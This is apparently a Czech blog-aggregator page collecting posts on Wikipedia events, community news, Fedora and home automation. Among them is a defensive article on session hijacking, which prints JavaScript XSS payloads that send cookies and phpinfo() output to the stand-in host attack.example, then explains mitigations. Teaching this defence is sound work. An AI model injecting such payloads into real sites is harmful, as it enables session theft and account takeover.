Planeta OpenAlt

WhatsApp u dětí, rodičů v práci i ve škole

V digitálním věku se komunikace mezi dětmi, učiteli a rodiči stále více přesouvá do on-line prostředí. Jednou z nejčastěji používaných platforem je WhatsApp, který nabízí jednoduchý a rychlý způsob, jak sdílet informace a komunikovat v reálném čase. Avšak tato forma komunikace přináší …

Příspěvek WhatsApp u dětí, rodičů v práci i ve škole pochází z Spajk.cz

Romská autorka Eva Danišová vydává knihu, která inspiruje k učení nejen romské děti

21.
května
Nadace OSF

Ne všechny děti vyrůstají v takových podmínkách, aby jednou mohly naplnit svůj potenciál. Život v sociálně vyloučených lokalitách i mimo ně profesní dráhu těch romských předurčuje již v raném věku k nezdaru i kvůli tomu, že už na samém prahu vzdělávání musí zdolat řadu bariér. Nakladatelství Kher s podporou Nadace OSF i 150 dárců, jejichž dary zdvojnásobila Nadace Albatros, vydalo edukativní knihu Jekh, duj, trin! Jak jedna malá žabka dohopkala do školy. Jejím záměrem je vzbudit v dětech zvídavost, přiblížit jim, co je nejen ve škole čeká, a pomoci jim s přípravou do ní, aby zde mohly být úspěšné stejně jako jiné děti.

(více…)

Čo apríl 2024 dal a vzal

21.
května
Fero Volár
Čo apríl 2024 dal a vzal

Prvý apríl, ak sa naň pozriem cez čísla čítanosti a zdieľania tohto článku mi vyšiel výborne. Pozrime sa ale aj na ďalšie dni.

  • 🥱 Apríl sa u mňa niesol v podobe jarnej únavy a nejakej vnútornej nespokojnosti. Asi tie voľby.
Čo apríl 2024 dal a vzal
  • 🎟️ Pomohla mi na to permanentka do Botanickej záhrady.
  • 📷 Podarilo sa mi fixnúť problém s foťákom. Už som si naň celkom rýchle zvykol.
  • 😎 Dá sa už nič nerobiť na deke v parku, alebo pri Dunaji. Na takéto počasie som sa tešil.
  • 🤖 V Labyrinth Labs sme zorganizovali v Spote spolu s AWS poldňovú konferenciu zameranú na GenAI.
Čo apríl 2024 dal a vzal
  • 📖 Z kníh ma najviac zaujala Budoucnost (ne)práce od Filipa Dřímalku a Toto je marketing od Setha Godina.
  • 🛖 Vrcholom mesiaca a jeho super zakončením bola Hytta. Ja som ju spomínal len nedávno na vlogu a teraz som sa do nej takmer po roku vrátil. S partnerkou a na dlhšie. Je to láska.
Čo apríl 2024 dal a vzal
  • Už teraz vám viem sľúbiť, že máj bude našlapaný.

Ve vědění je síla, vzkazuje Wikimedia Česká republika. Výzva Lidská práva na Wikipedii právě začíná

20.
května
Wikimedia ČR

Spolek Wikimedia Česká republika, který pečuje o rozvoj české Wikipedie, věnuje konec května a celý červen na Wikipedii lidským právům. Pod záštitou zmocněnkyně vlády pro lidská práva Kláry Šimáčkové Laurenčíkové chce motivovat dobrovolné wikipedisty a wikipedistky i veřejnost, aby psali články o širokých lidskoprávních a humanistických tématech, historii i osobnostech. Hlavní editaton výzvy se koná 26. 6. v Praze ve spolupráci s Amnesty International.

Projekt Lidská práva na Wikipedii spojuje vytváření nových hesel pro Wikipedii s podporou lidských práv. Výzva začíná 20. 5. a běží až do konce června. Lze se jí zúčastnit online nebo osobně během tzv. editatonů, kde mohou nováčkům poradit zkušení lektoři a lektorky. Hlavní editaton proběhne ve spolupráci s Amnesty International 26. 6. v Praze v Langhans – v kavárně a centru Člověka v tísni od 15:00. Pro neziskové organizace připravuje Wikimedia ČR 5. 6. od 15:00 online workshop Jak dostat vaše téma na Wikipedii?.

Wikipedie i další wiki projekty usilují podle organizátorů výzvy o to, aby měl každý člověk opravdovou možnost se svobodně podílet na souhrnu všech znalostí. Stojí na možnosti „svobodně vyhledávat, přijímat a předávat informace“. Všeobecná deklarace lidských práv tuto možnost výslovně ukotvuje v 19. článku jako lidské právo.  

Výzva Lidská práva na Wikipedii již třetí rok ukazuje, že Wikimedia ČR se nechce o toto právo pouze opírat, ale také ho aktivně umožňovat. Chceme lidem nejen zprostředkovat přístup k neutrálním a aktuálním informacím o lidských právech, ale také ukázat jejich rozmanitost. Encyklopedická hesla na Wikipedii mohou postihnout silné příběhy obyčejných lidí bojující za lepší svět, stejně jako komplexnost nových lidskoprávních výzev v digitálním věku. Pojďme společně zajistit přístup k informacím o širokých lidskoprávních a humanistických tématech, historii a osobnostech. Ve vědění je síla!“ říká výkonná ředitelka Wikimedia Česká republika.

Editující se tak mohou pustit např. do rozšíření hesla o slavné Erin Brockovich nebo vytvořit zcela chybějící články, jako jsou Digitální práva nebo Právo na přístup k internetu, které mají mnoho jazykových mutací, ale na české Wikipedii zatím chybí. Psát je možné o čemkoliv, co s lidskými právy souvisí. Například o aktivistech za lidská práva, historii nebo třeba filmech, které se problematiky týkají.

Záštitu nad akcí převzala zmocněnkyně vlády pro lidská práva Klára Šimáčková Laurenčíková.

Součástí výzvy je také soutěž o poukázky do e-shopu Albatrosmedia.cz pro 10 nejlepších, které opět do soutěže věnovala Nadace Albatros. Ta navíc letos ocení každého účastníka a účastnici bez ohledu na umístění. Všichni zúčastnění tak získají 25% slevu na nákup v e-shopu a dopravu zdarma. 

Pro účast v soutěži stačí do shrnutí editace článku vložit hashtag #lidskaprava.

Kontakt:Hynek Kaplan
PR specialista a fundraiser
hynek.kaplan@wikimedia.cz

The post Ve vědění je síla, vzkazuje Wikimedia Česká republika. Výzva Lidská práva na Wikipedii právě začíná first appeared on Wikimedia ČR - blog.

Robotický den 2024

20.
května
RoboDoupě

Již 19. ročník soutěže Robotický den proběhne 9. června v Kongresovém centru v Praze. Je přihlášeno 128 robotů z 8 zemí (ČR, SK, PL, UA, DE, ES, PT a CY). Spolu s nimi by mělo dorazit 228 soutěžících rozdělených do 52 týmů. Soutěžícím bude 8 až 75 let. Víc asi netřeba dodávat (případně se [...]

Měsíc žen na Wikipedii ji obohatil o 382 nových a celkem 565 editovaných článků

15.
května
Wikimedia ČR

Březen a první týden v dubnu patřil na Wikipedii opět ženám a tématům s ženami spojenými. Díky výzvě Měsíc žen na Wikipedii, který již po sedmé pořádal spolek Wikimedia Česká republika, se podařilo 91 wikipedistům a wikipedistkám vytvořit 382 článků a dalších 183 rozšířit – celkem udělali 565 editací.

Letos jsme se společně sešli čtyřikrát: v Americkém centru, na Akademii věd, na Fakultě sociálních věd UK a ve Státním oblastním archivu v Praze. Spolupráce s různými partnery dlouhodobě pomáhá zasáhnout rozmanitou výseč témat a žen, resp. jejich biografií, které je potřeba pro Wikipedii zpracovat. Ať už jde o témata týkající se např. vědních disciplín či kulturních oblastí. Díky tomu se výzvě daří přilákat k editování nováčky s expertním vhledem. 

Cílem výzvy je jednak motivovat více žen k editování Wikipedie a jednak zvětšit objem biografií a souvisejících článků, které o ženách a s nimi spojených tématech pojednávají. V současnosti se na české Wikipedii nachází 120 tisíc biografií mužů a jen 26 tisíc biografií žen. Nepoměr je také v rozložení editorů. Pouze 1 z 10 dobrovolných editujících je žena. Do psaní článků se mohl v rámci výzvy zapojit kdokoliv – buď online z pohodlí svého domova, nebo přijít na některou z našich akcí, kde byli nejen úplným nováčkům k ruce naši zkušení lektoři a lektorky. 

Editování společně s velvyslancem

Hlavní akcí Měsíce žen na Wikipedii je již tradičně editaton v Americkém centru v Praze. Ve čtvrtek 21. března přišlo editovat 37 lidí a 5 se jich připojilo online.

„Editaton se zde konal již posedmé, velice si ceníme naší dlouhodobé spolupráce. Je to skvělá možnost jak sdílet společný zájem, slyšet příběhy jednotlivých článků a být svědkem cesty, kterou k jejich vytvoření musejí editoři a editorky ujít,“ říká Klára Joklová, výkonná ředitelka spolku Wikimedia Česká republika.

Na světě je spousta zajímavých žen, ať už v politice, v umění, ve vědě. Je škoda, že o nich víme tak málo a že na Wikipedii nemají zastoupení, které by si zasloužily.

– Kristina Němcová, účastnice editatonu

Vzácným hostem byl velvyslanec Spojených států amerických Bijan Sabet. Vyzkoušel si, jak se do Wikipedie přispívá a utvrdil naše dobré vztahy s americkou ambasádou, která spolek Wikimedia Česká republika dlouhodobě podporuje.

„Píšu článek o české sochařce Dagmar Šubrtové. Měla už asi 20 samostatných a nespočetně kolektivních výstav, takže ta tvorba hesla není příliš jednoduchá,“ komentuje Jiřina Kádnerová. Její článek vychází čistě z vlastních rešerší, za informacemi pro článek cestovala i do různých knihoven a galerií. Referencí – odkazů na literaturu nebo relevantní weby – je v článku na 125. 

Na tvorbu článku si našel čas i hlavní lektor spolku Wikimedia ČR, Pavel Bednařík: „Rozhodl jsem se přispět článkem o německé herečce Sandře Hüller, která hrála v oscarovém filmu Zóna zájmu a myslím si, že zrovna ona si zaslouží být na české Wikipedii.“

Ženy, média a Wikipedie: Téma pro studenty FSV UK

Autor: Jan Beránek, CC BY-SA 4.0, via Wikimedia Commons

Workshop Ženy, média a Wikipedie byl prvním, který jsme organizovali ve spolupráci se spolkem Studenti IKSŽ na Fakultě sociálních věd Univerzity Karlovy. Financování zajistil grant od Akademického senátu FSV UK. 

Pozvání do diskuse přijala zahraniční reportérka České televize Ilona Zasidkovyčová, doprovodila ji editorka Pavlína Tomášová. Přednáška se věnovala zejména působení Ilony na Ukrajině, při diskusi byl dán prostor tématům souvisejícím např. s genderovými předsudky. Díky workshopu vznikl také článek právě o Iloně Zasidkovyčové nebo byla nahrána fotka Markéty Fialové.

„Workshop Ženy, média a Wikipedie patřil mezi nejzajímavější edukační akce spolku Studenti IKSŽ. Podobné praktické kurzy s přesahem do jiného druhu mediální komunikace, než je zpravodajství, popřípadě PR, jsou na našem institutu bohužel nedostatkovým zbožím, a tak se stávají velmi žádanými ze strany studentů. Budeme velice rádi, pokud se spolkem Wikimedia ČR budeme moci spolupracovat i nadále!

– Michael Benda, místopředseda spolku Studenti IKSŽ

Ženy ve vědě – zvuky klávesnic se opět rozezněly Akademií věd

Již podruhé jsme spojili síly s Fyzikálním ústavem Akademie věd a hned z kraje editační výzvy jsme se potkali v krásných prostorách hlavní budovy Akademie věd na Národní třídě – tématem tohoto editatonu byly, stejně jako minulý rok, Ženy ve vědě. Samotné editování doprovodila putovní výstava České vědkyně a jejich přínosy nejen české vědě

Kromě Fyzikálního ústavu se letos zapojil také Historický ústav a wiki-rezidenti z několika partnerských institucí, muzeí a knihoven. Účastníci tvořili pestrý mix vědeckých pracovníků, wikipedistů a seniorů. Čas na editování si našel i předseda spolku WMČR Michal Reiter a spolu s ním několik dalších členů. 

Atmosféru akce můžete načerpat třeba skrze fotografie Richarda Sekeráka.

Ženy a archivy

Součástí Měsíce žen na Wikipedii byla v letošním roce také akce nazvaná Ženy a archivy, kterou jsme připravili jako součást GLAM spolupráce se Státním oblastním archivem v Praze (SOA). Seminář a workshop zaměřený na významné ženy a jejich odkaz byl určen středočeským archivářům a archivářkám, kteří si vyzkoušeli psaní a zdrojování původních článků. Mj. vznikly  nové příspěvky, jako např. článek o významné řeholnici Antoinettě Olze Chotkové.

Jak dopadla soutěž o ceny?

Všechny účastníky a účastnice výzvy jsme ocenili virtuální „medailí“ (uživatelským vyznamenáním vytvořeným právě pro tuto událost). Navíc pro prvních 100 účastnic a účastníků výzvy Měsíc žen na Wikipedii poskytl partner soutěže Audioteka měsíční vstup do svého Audiotéka klubu, což znamená přes 1 500 titulů k poslechu bezplatně v rámci předplatného a 20 % slevu na tisíce dalších audioknih.

Mezi 10 vítězů a vítězek jsme rozdělili poukázky od nakladatelství wo-menroční předplatné časopisu Heroine a další ceny. Kdo mezi ně patří? Podívejte se do tabulky níže.

NejaktivnějšíKarelkam83 příspěvků
Svajcr54 příspěvků
Dobroš36 příspěvků
Cena porotyNaďačelkvalitní texty o součaných vědkyních
Miroslava Fišerovákvalitní texty o současných světových umělkyních
JanaJinMarie Krakešová, Štěpánka Jislová
HalfirienEmma Stebbins, Adelaide Johnson
Jrnka kaDagrmar Šubrtová
RomanvysanskyMatky z Náměstí nebeského klidu
MAKY.ORELPříkrm

O vyhodnocení soutěže se postarali:

Projekt finančně podpořilo Velvyslanectví USA v České republice v rámci programu Small Grants. 

Děkujeme našim partnerům i všem, kdo se do letošní výzvy zapojili. Vítězům gratulujeme. Těšíme se opět za rok!

Pokračujeme nejen v březnu

V průběhu celého roku je aktivní skupina Ženy na Wikipedii na Facebooku. Budeme moc rádi, pokud se do ní přidáte a budete zde sdílet zkušenosti, navzájem si radit s editováním, sdílet články o významných ženách nebo tipy na články chybějící. Zajímá nás, co editorky a editoři na Wikipedii zažívají a jak toto prostředí dál kultivovat. Zapojte se také! Pojďme vytvořit skupinu lidí, která ženy na Wikipedii vítá.

Podívejte se za námi do Amerického centra

Jak probíhal editaton v Americkém centru? Podívejte se na video níže, ze kterého načerpáte atmosféru místa.

The post Měsíc žen na Wikipedii ji obohatil o 382 nových a celkem 565 editovaných článků first appeared on Wikimedia ČR - blog.

Kradení session id pomocí phpinfo() a jak tomu zabránit

15.
května
Michal Špaček

Aktualizace článku

  • 15.5. Doplnil jsem odstavec Co nedělat

Klasické přihlášení do webové aplikace vypadá tak, že zadáte jméno a heslo, formulář odešlete, aplikace přihlašovací údaje ověří a do tzv. sessiony uloží informaci, že jste přihlášeni. Do prohlížeče pak odešle cookie s identifikátorem session (session id), který označuje tu vaši „plechovku“ se session daty. Váš session id nikdo jiný úmyslně nedostane, pokud by ho totiž získal, byl by pak přihlášen do vašeho účtu, což by bylo značně nežádoucí.

Session hijacking

Ale to by tu nesměli být různí mizerové: ti se od vás snaží ideálně nějak nepozorovaně získat právě ten session identifikátor, tím se dostat do vaší sessiony a v podstatě se za vás vydávat, sessionu vám tzv. unést (anglicky se tomu říká „session hijacking“). Takový klasický způsob ukradení session id je pomocí útoku Cross-Site Scripting (XSS), kdy do stránky útočník nějak vloží JavaScript, ať už přímo, nebo vložením externího souboru, který zákeřný kód bude obsahovat. Ten vložený kód může vypadat např. takto:

new Image().src = 'https://attack.example/?cookie=' + encodeURIComponent(document.cookie);

Když pak návštěvník na stránku přijde, jeho prohlížeč uvidí JavaScript, vytvoří objekt typu Image a bude chtít načíst obrázek z uvedené adresy. Ta v parametru cookie obsahuje pro přenos v URL bezpečně zakódované všechny cookie, ke kterým má JavaScript aktuálně přístup, tedy ty, které jsou uložené pro aktuální stránku (dle nastavení atributu Domain, Path atd.) a nemají nastaven příznak HttpOnly.

Útočník si pak na svém serveru attack.example může zobrazit i třeba jenom access log, ve kterém uvidí požadavek na např. /?cookie=PHPSESSID%3D68516bed29d47527b8b23bd7dec20f19, z něj si pak vyzobne session id, v browseru načte stránku, ze které session id ukradl, otevře developer tools a přidá nebo změní cookie PHPSESSID, stránku pak reloadne a rázem je v té samé sessioně, česky sezení, přihlášen jako uživatel chudáka oběti.

Atribut HttpOnly

Pokud cookie má atribut HttpOnly, tak k ní JavaScript nemá přístup a kódem uvedeným výše ukrást nepůjde. To si ostatně můžete vyzkoušet v podstatě na jakémkoliv webu: ve vašem prohlížeči v developer tools si v záložce Application (Chrome) nebo Storage (Firefox) najděte nějakou cookie, která má příznak HttpOnly, a v konzoli, kterou můžete rovnou zobrazit stiskem klávesy Escape, si příkazem document.cookie vypište všechny cookies tak, jak je vidí JavaScript – cookies s HttpOnly tam nebudou.

Cookie s atributem HttpOnly není v document.cookie vidět

A cookie se session id, v PHP aplikacích obvykle pojmenovaná PHPSESSID, atribut HttpOnly má často nastaven. V defaultní konfiguraci PHP se ale nenastavuje a je potřeba to udělat dodatečně ručně např. pomocí

ini_set('session.cookie_httponly', true);

Obcházení HttpOnly pomocí phpinfo()

Takže smůla, ledaže… ledaže by na webu někde byl zobrazen výstup z phpinfo(), PHP funkce, která vypisuje úplně všechno o aktuálně použitém PHP. Klasicky bývá na /info.php nebo /phpinfo.php, občas třeba v administraci za přihlášením, což je ta lepší a doporučovaná varianta, ale sama o sobě zde popisovaný problém nevyřeší. phpinfo() jsem zmiňoval i v článku o Full Path Disclosure, protože kromě konfigurace PHP a informacích o rozšířeních zobrazí právě i cestu k souborům, která se útočníkům může k něčemu hodit.

phpinfo()

Klasický výstup z phpinfo()

Ve výstupu z phpinfo() ale jsou vypsané i hodnoty cookies, které browser při požadavku poslal, včetně těch s HttpOnly, protože takové cookies se normálně po síti přenáší a server je tedy v rámci požadavku obdrží. Ve výpisu tedy bude i hodnota session id, minimálně jako řádek s např. $_COOKIE['PHPSESSID'], ale dle verze PHP a konfigurace klidně i víckrát.

Session identifikátor v phpinfo() v poli $_REQUEST, $_COOKIE i $_SERVER

Toho může útočník využít: místo aby kradl session id JavaScriptem přímo z browseru pomocí document.cookie, tak si JavaScriptem pošle požadavek na např. /phpinfo.php, vytáhne si jen tu pro něj zajímavou část odpovědi, kterou pak připojí k následujícímu požadavku, který si pošle k sobě. To zařídí třeba následující kód, který někam do stránek na doméně https://app.example/ vloží místo výše uvedeného new Image().src …:

fetch('https://app.example/info.php')
  .then(response => response.text())
  .then(text => {
    cookie = text.match(/_COOKIE.{1,2000}/)[0];
    fetch('https://attack.example/?cookie=' + encodeURIComponent(cookie));
  });

Na prvním řádku pošleme požadavek na /info.php, druhý a třetí řádek zajistí, že v proměnné text budeme mít výstup z phpinfo(), ze kterého si na čtvrtém řádku vytáhneme řetězec _COOKIE a dalších maximálně 2000 znaků, ve kterých zcela určitě, kromě nějakého toho HTML, bude i session id. Na pátém řádku pak tento podřetězec přidáme do požadavku odesílaného na attack.example. Odpověď už nás nezajímá, stačí že prohlížeč poslal požadavek, a na serveru se pak podíváme do access logu. Mohli bychom si klidně poslat celé phpinfo(), ale potřeba to není, jdeme jenom po cookie se session id.

Pokud budete mít v aplikaci nějaký Cross-Site Scripting, aby útočník mohl vložit svůj zákeřný JavaScript, a výstup z phpinfo(), jedno jestli veřejně nebo za přihlášením, tak mizera může ukrást session id i když cookie, ve které se přenáší, má atribut HttpOnly.

Co s tím?

  1. Nemějte na webu XSS
  2. Nemějte v aplikaci výstup z phpinfo(), nebo věci jako var_dump($_SERVER) apod., a už vůbec ne veřejně

Teorie i praxe říká, že je lepší počítat s tím, že tam nějaký ten Cross-Site Scripting někdy mít budete, takže bod č. 1 padá. No a výstup z phpinfo() je celkem užitečná věc, takže bod č. 2 je také často nereálný.

Až když jsem psal bug report s titulkem „System Information contains sensitive information like the session id cookie“, tak mě napadl kompromis: phpinfo() v administraci necháme, ale ty důležitý údaje skryjeme, na ty tam stejně nikdo nekouká. Další úrovní zabezpečení by mohlo být zadání hesla nebo třeba 2FA kódu před naprosto každým zobrazením výstupu z phpinfo().

spaze/phpinfo

Už dříve jsem si vytvořil jednoduchý balíček spaze/phpinfo, který vezme výstup z phpinfo(), odřízne HTML hlavičku aby se ten výstup dal vložit do nějakého vlastního designu administrace apod. a inline CSS style="…" nahradí za class="…". Do této třídy jsem přidal sanitizaci, která defaultně nahrazuje hodnotu session id za hvězdičky.

Použití je skoro tak jednoduché jako zavolání phpinfo():

$info = new \Spaze\PhpInfo\PhpInfo();
echo $info->getHtml();

Jádrem toho celýho zázraku je v podstatě tenhle kód:

ob_start();
phpinfo();
$info = ob_get_clean();
echo str_replace(session_id(), '*****', $info);

Můžete si ale přidat vlastní nahrazování dalších hodnot jako jsou např. cookie pro permanentní přihlašování a další, můžete si zvolit i vlastní „hvězdičky“:

// $loginToken = getLoginTokenValue(); např.
$info = new \Spaze\PhpInfo\PhpInfo();
$info->addSanitization($loginToken, 'hele, asi spíš ne');
echo $info->getHtml();

Také bych doporučil výslovně uvést session id a nespoléhat se jen na samo-se-to, například pomocí něčeho jako:

$info = new \Spaze\PhpInfo\PhpInfo();
$info->addSanitization($this->sessionHandler->getId(), '[nope]');
echo $info->getHtml();

Na mém webu to všechno zajišťuje třída SanitizedPhpInfo (pokrytá testem), výsledek pak vypadá nějak takhle:

phpinfo() s maskovanými hodnotami v $_COOKIE[‚PHPSESSID‘] a $_SERVER[‚HTTP_COOKIE‘]

Setec Astronomy je přesmyčka „too many secrets“

Místo prostého volání phpinfo() tedy raději použijte spaze/phpinfo. Funkci phpinfo() jsem přidal i do spaze/phpstan-disallowed-calls, což je rozšíření pro PHPStan, které hledá nebezpečné funkce a další ve vašem kódu.

Co nedělat

Tento článek sice nemá být kompletním návodem na (obranu proti) kradení sessions, ale dokážu si představit, že i přesto vás napadne několik Zaručené Dobrých Nápadů™️, jak takovým únosům zabránit.

Již mnoho let takovým klasickým nápadem bývá „přilepení“ sessions jen ke konkrétní IP adrese a z jiné, např. útočníkovo, se i při znalosti session id do té sessiony dostat přece nepůjde. To zní skvěle do té doby, než si uvědomíme jak často říkáme „musím jít, to dodělám doma/na chatě/v kavárně“, nebo že naše kancelář má vlastně několik připojení do Internetu, které se na první pohled náhodně přepínají.

Všechno uvedené má za následek, že se IP adresa mění častěji, než by se na první pohled mohlo zdát, což by způsobovalo příliš časté odhlašování a hlavně přihlašování, a tím značné snížení použitelnosti. Nedoporučuji.

Tak tu sessionu navážeme třeba na verzi prohlížeče! Dobrej nápad, jen teda verze prohlížeče samotná není moc unikátní a navíc se mění při každé aktualizaci. Tak si browser nějak označíme, nějakým dalším identifikátorem, nebo otiskem, fingerprintem. Jasně, akorát teda ten fingerprint asi uložíme do cookie, která… se taky zobrazí v phpinfo().

Tak budeme ten fingerprint zjišťovat při každém požadavku automaticky, třeba pomocí JavaScriptu! Zajímavé, ale předpokladem je, že útočník si na stránce taky může spustit vlastní JavaScript, který ten fingerprint zjistí stejně jako ten váš JavaScript, nehledě na to, že browsery se takové sledování uživatelů snaží do jisté míry eliminovat.

Možná by to tedy chtělo nějaké moderní systémové řešení, ne jako náhradu cenzury phpinfo() popisované výše, ale spíš jako doplněk. Hmm, a co takhle třeba:

Device Bound Session Credentials

Kradení cookies ale možná bude velmi brzy již minulostí, Chrome totiž experimentuje s něčím, co nazývají Device Bound Session Credentials. To by mělo zajistit, že sessiona bude svázaná s konkrétním zařízením, používají k tomu veřejné a soukromé klíče a TPM pro jejich uložení. Mělo by to také fungovat jako jakási nadstavba nad klasickými sessions, nemělo by to vyžadovat nějaké brutální změny všeho možného.

Prototyp tohoto řešení už chrání některé Google účty pokud uživatelé používají Chrome Beta a do konce roku 2024 by Device Bound Session Credentials na zkoušku měly být dostupné i veřejnosti a dalším webům jako tzv. Origin Trials.

Slasti a strasti IT náboru

Jiří Kostov – Moravio
11. 6. 2024 – úterý
17:30 - 19:00 – 18:00 espresso note
Máma mele kafe – Hrnčířská 3, Opava

Z projekťáka personalistou, z českého prostředí do mezinárodního, inhouse vs remote. Co vše obnáší dělat HR pro malou českou softwarovou agenturu s mezinárodním přesahem?

Druhý ročník Wiki Loves Earth Czechia je tady – ukažte světu to nejkrásnější z Česka

09.
května
Wikimedia ČR
Foto: Ledňáček říční, Autor: Verunecka007, CC BY-SA 4.0, via Wikimedia Commons.

Již podruhé pro vás přinášíme možnost zapojit se do mezinárodní fotografické soutěže Wiki Loves Earth prostřednictvím její české mutace Wiki Loves Earth Czechia 2024.

Fotografování přírody patří mezi nejoblíbenější fotografická témata. Na základě velkého zájmu se proto spolek Wikimedia Česká republika rozhodl zapojit do dalšího ročníku soutěže zaměřeného na dokumentování chráněných území v Česku. V roce 2023 se do soutěže zapojilo téměř 100 fotografů a bylo nahráno 350 fotografií. 

Foto: Hlazení, Autor: Johny136, CC BY-SA 4.0, via Wikimedia Commons.

Jak se zapojit do Wiki Loves Earth?

Soutěže Wiki Loves Earth Czechia 2024 se může zúčastnit kdokoli. Stačí nahrát vlastní fotografii zachycující krásy přírody českých chráněných území na Wikimedia Commons. Soutěž probíhá od 1. května do 14. června 2024 avšak soutěžit lze i s fotografiemi pořízenými v minulosti..Abyste mohli vyhrát, musí být fotka pořízená v některém z chráněných území a musí mít alespoň 2 MB. Dále je potřeba při nahrávání popsat, co se na fotografii nachází a kde byla fotka pořízena. Do soutěže lze přihlásit až 5 fotografií. Podrobný návod na nahrání fotky krok za krokem najdete na stránkách soutěže Wiki Loves Earth Czechia 2024.

Foto: Běžník listový, Autor: Xsandman, CC BY-SA 4.0, via Wikimedia Commons.

Jak si dopomoct k bezchybným fotkám?

Pro dva nejlepší fotografy či fotografky máme připravené roční předplatné programu k úpravě fotografií ZPS X od partnera soutěže Zoner. Odborná porota dále vybere 10 nejlepších fotografií, které postoupí do mezinárodního kola Wiki Loves Earth, kde budou reprezentovat naši zemi a soutěžit o hodnotné ceny. Pojďte do toho, hraje se o hodně!

Nejlepší fotky WLE Czechia 2023

V loňském ročníku postoupilo na základě poroty do mezinárodního finále těchto deset fotografií. 

Bude letos mezi výherními fotografiemi ta vaše?

The post Druhý ročník Wiki Loves Earth Czechia je tady – ukažte světu to nejkrásnější z Česka first appeared on Wikimedia ČR - blog.

Novinářská cena 2023 zná své vítěze: Letos jsme poprvé udělili ceny za ekonomickou a zahraniční žurnalistiku

06.
května
Nadace OSF

Nadace OSF ocenila v pondělí 6. května Novinářskou cenou nejlepší příspěvky uplynulého roku. Ceny se udělují celkem ve 13 kategoriích, do 9 z nich může nominovat veřejnost. Vítězky a vítězové se prosadili v konkurenci rekordních 890 přihlášených příspěvků. Ty hodnotí poroty složené z respektovaných osobností veřejného života z České republiky i zahraničí. Pořadatelkou Novinářské ceny je Nadace OSF, která už více než 30 let pečuje o demokracii v Česku. Večerem provázeli Jiří Havelka a Eva Čechová. 

(více…)

Fedora 40 release party v Praze

V pátek 17. května se od 18:30 uskuteční release party u příležitosti vydání Fedory 40. Akce se koná v prostorách společnosti Etnetera Core na adrese Jankovcova 1037/49, Praha 7. Součástí bude program kratších přednášek o novinkách ve Fedoře, který tady budeme postupně doplňovat. Pokud by vás nějaké téma zajímalo, dejte nám vědět tady v komentářích nebo na sociálních sítích. Po přednáškovém programu bude následovat neformální program. Zváni jsou nejen uživatelé a příznivci Fedory.

Program:

  • Co je nového ve Fedora 40 Workstation - Jiří Eischmann
  • KDE Plasma 6 - Karel Ziegler
  • Legacy Computing: Atomic PI + Fedora + QEMU + FreeDOS - Lukáš Kotek (slidy)
  • GTK, Flathub jako hobby. Jak snadné je vyrobit a publikovat v dnešní době aplikaci? - Ondřej Kolín

Interview ve Studiu ČT24 o útocích skupiny APT28 na ČR

06.
května
Jan Kopriva

V souvislosti s nedávným prohlášením Ministerstva zahraničí ke kyberútokům ruské skupiny APT28 na Česko jsem byl o víkendu pozván do vysílání odpoledního Studia ČT 24, kde jsem měl možnost krátce pohovořit o výše zmíněné skupině a jí užívaných postupech. Záznam z vysílání Studia ČT24 najdete v případě zájmu na tomto odkazu - část věnovaná výše zmíněnému tématu začíná začíná přibližně na páté minutě…

Studio ČT24

Pravidelná dezinfekce studny – užitečné automatizace

03.
května
Táta Geek

Tento článek je volným pokračováním textu o měření spotřeby vody v domácnosti. Na spotřebu vody lze totiž navázat spoustu užitečných automatizací. Já začal pravidelnou dezinfekcí naší studny. Dezinfekci jsem do studny lil v pravidelných časových intervalech, podle upomínky v kalendáři a fungovalo to celkem dobře. Ale proč nezkusit nějaký více geekovský přístup? Někdy je spotřeba vody větší, jindy menší, tak si odešlu upomínku po určitém množství spotřebované vody.

Moje výchozí situace

Ve sprchovém koutě se nám v rozích, na baterii a sprchové hlavici vytvářely oranžovo-růžové skvrny. Na zapomenutém místě, které nebylo dlouho dezinfikováno, to vypadalo, jako kdyby rostla plíseň – nebyla to jen barevná skvrna, ale plíseň měla „3D tvar“. Podle toho, co se nám podařilo dohledat, se jedná nespíš o bakterii „Serratia marcescens“. Vodu ze studny používáme jako užitkovou. Na pití a vaření máme zavedenou vodu městskou a v kuchyni máme 2 kohoutky. S vodou ze studny si tedy můžu dělat pokusy jaké chci.

Kdysi dávno, když jsme se nastěhovali, jsme si nechali udělat rozbor vody. Voda v rozboru vyšla jako nepitná a obsahovala zvýšené množství dusičnanů a také koliformní bakterie. K odstranění koliformních bakterií byla doporučena dezinfekce na bázi chloru. Myslím si, že jsme tenkrát nedělali maximální možný rozbor, ale jen základní, takže žádné další bakterie potvrzené nemáme.

Jak na automatizované odesílání upomínek

Krok 1 – měření spotřeby vody vodoměrem

Protože vodu ze studny používám i na zalévání zahrady, mám v Home Assistant vytvořené 2 senzory. Jeden pro domácnost a druhý pro zahradu. Více informací o vytvoření senzorů spotřeby vody naleznete v článku Jak změřit spotřebu vody v domácnosti.

Celá automatizace vychází tedy z těchto dvou senzorů:

sensor.dum_hodinova_spotreba_vody
sensor.zahrada_hodinova_spotreba_vody

Krok 2 – vytvoření pomocníků

Aby automatizace měly s čím pracovat, vytvořil jsem v Home Assistant 2 pomocníky. Jeden přičítá spotřebu vody od poslední dezinfekce a druhý eviduje datum poslední dezinfekce.

V Home Assistant tedy mám 2 pomocníky:

counter.spotreba_vody_od_posledni_dezinfekce
input_datetime.dezinfekce_studny
Pomocníci v Home Assistant
Nastavení pomocníka typu "počítadlo" v Home AssistantNastavení pomocníka typu „počítadlo“
Nastavení pomocníka typu "datum" v Home AssistantNastavení pomocníka typu „datum“

Krok 3 – pravidelné aktualizování pomocníka „celková spotřeba“

Když mám hotového pomocníka, vytvořím automatizaci, která bude v pomocníkovi navyšovat spotřebu vody. Protože k budu přičítat „hodinový senzor“ musím jeho hodnotu přičíst vteřinu před jeho hodinovým resetem. Vytvořil jsem tedy automatizaci, která každou hodinu v 59 minut a 59 vteřin navýší spotřebu. Tady je její YAML kód:

alias: Spotřeba vody od poslední dezinfekce
description: ""
trigger:
- platform: time_pattern
minutes: "59"
seconds: "55"
condition: []
action:
- service: counter.set_value
data_template:
entity_id: counter.spotreba_vody_od_posledni_dezinfekce
value: >-
{{ (states('counter.spotreba_vody_od_posledni_dezinfekce') | float) +
(states('sensor.dum_hodinova_spotreba_vody') | float) +
(states('sensor.zahrada_hodinova_spotreba_vody') | float) }}
mode: single

Krok 4 – vyhodnocení, zda spotřeba vody překročila stanovené množství

